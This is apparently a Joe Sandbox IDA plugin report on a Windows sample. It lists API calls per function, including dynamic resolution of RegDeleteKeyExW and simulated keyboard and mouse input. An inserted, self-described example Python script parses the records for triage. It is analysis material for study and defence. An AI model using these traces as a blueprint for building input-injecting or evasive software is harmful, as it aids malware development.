                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1269668773-0
                                                                              • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                              • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                              • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                              • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                              APIs
                                                                                • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                              • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                              • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                              • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                              • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              • API String ID: 4166825349-0
                                                                              • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                              • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                              • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                              • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                              • API String ID: 2574300362-3261711971
                                                                              • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                              • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                              • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                              • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
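The function records above are a flat dump of one "APIs" listing per function, and two of them are the ones an analyst would want to pull out first: the record that resolves RegDeleteKeyExW at run time through LoadLibraryA/GetProcAddress, and the record that duplicates handles from the current process and then calls CreateThread. The following Python script is an added example and is not part of the Joe Sandbox report or the sample; it parses lines in exactly the format printed above (the bullet, the `Api.MODULE(args)` call, the `ref:` address, and the indented "Part of subcall function" variant), groups them per record, tags records with a few heuristics, and pairs each GetProcAddress symbol with the preceding LoadLibrary* module name. The sample input is constructed by copying lines from this page; the tag names and heuristics are the example's own assumptions, not Joe Sandbox terminology.

```python
import re

# Constructed sample input: lines copied verbatim from the report's "APIs" listings above.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
APIs
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
• CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
APIs
  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00438FE8
• SetErrorMode.KERNEL32(00000001), ref: 0045D32F
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
• __swprintf.LIBCMT ref: 0045D3CC
"""

# One call line: ApiName.MODULE, an optional "(args)", an optional comma, then "ref: <8 hex digits>".
# CRT helpers such as "__swprintf.LIBCMT ref: ..." have neither parentheses nor a comma.
API_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})")

# Assumption of this example: any of these in the same record as GetProcAddress counts as
# run-time import resolution.
DYNAMIC_LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def parse_api_records(text):
    """Split the report text at each 'APIs' header and collect the call lines under it.

    Direct calls go to record['apis']; lines marked 'Part of subcall function' go to
    record['subcall_apis'] so heuristics can choose whether to look through callees.
    """
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"apis": [], "subcall_apis": []}
            records.append(current)
            continue
        m = API_RE.search(line)
        if current is None or m is None:
            continue
        api, module, args, ref = m.groups()
        entry = {"api": api, "module": module,
                 "args": args.split(",") if args else [], "ref": ref}
        bucket = "subcall_apis" if "Part of subcall function" in line else "apis"
        current[bucket].append(entry)
    return records


def classify(record):
    """Tag a record with the example's own triage heuristics (names are assumptions)."""
    names = {e["api"] for e in record["apis"]}
    tags = []
    if "GetProcAddress" in names and names & DYNAMIC_LOADERS:
        tags.append("dynamic-import-resolution")
    if "DuplicateHandle" in names and "CreateThread" in names:
        tags.append("handle-dup+thread")
    if names & {"GetVolumeInformationA", "GetVolumeInformationW"}:
        tags.append("volume-info")
    return tags


def resolved_imports(record):
    """Pair each GetProcAddress symbol with the most recent LoadLibrary* module, in call order.

    Only works where the report recovered the string literals (as it did for advapi32.dll
    and RegDeleteKeyExW above); otherwise the module shows as '?'.
    """
    dll, out = None, []
    for e in record["apis"]:
        if e["api"] in DYNAMIC_LOADERS and e["args"]:
            dll = e["args"][0]
        elif e["api"] == "GetProcAddress" and len(e["args"]) >= 2:
            out.append(f"{dll or '?'}!{e['args'][1]}")
    return out


if __name__ == "__main__":
    for i, rec in enumerate(parse_api_records(SAMPLE)):
        first = rec["apis"][0]["ref"] if rec["apis"] else "?"
        print(f"record {i} (first ref {first}): {classify(rec)} {resolved_imports(rec)}")
```

Run against the whole report text instead of SAMPLE to get one line per function. Treat the tags as triage hints, not verdicts: resolving a single named export such as RegDeleteKeyExW through GetProcAddress is also what ordinary code does to stay loadable on Windows versions where that export is absent, so the "dynamic-import-resolution" tag only becomes interesting when a record resolves many exports or ones tied to injection or credential access.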
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                              • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                              • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                              • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00433724
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                              • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                              • GetWindowRect.USER32(?,?), ref: 00433814
                                                                              • ScreenToClient.USER32(?,?), ref: 00433842
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                              • String ID:
                                                                              • API String ID: 3220332590-0
                                                                              • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                              • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                              • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                              • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1612042205-0
                                                                              • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                              • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                              • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                              • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                              • SendInput.USER32 ref: 0044C6E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 2221674350-0
                                                                              • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                              • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                              • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                              • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2037614760-0
                                                                              • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                              • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                              • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                              • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 4189319755-0
                                                                              • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                              • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                              • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                              • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 1726766782-0
                                                                              • Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                              • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                              • Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                              • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                              • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                              • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                              • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                              • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                              • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                              • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                              • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 1976402638-0
                                                                              • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                              • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                              • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                              • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00442597
                                                                                • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                              • GetDesktopWindow.USER32 ref: 004425BF
                                                                              • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                              • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • GetCursorPos.USER32(?), ref: 00442624
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
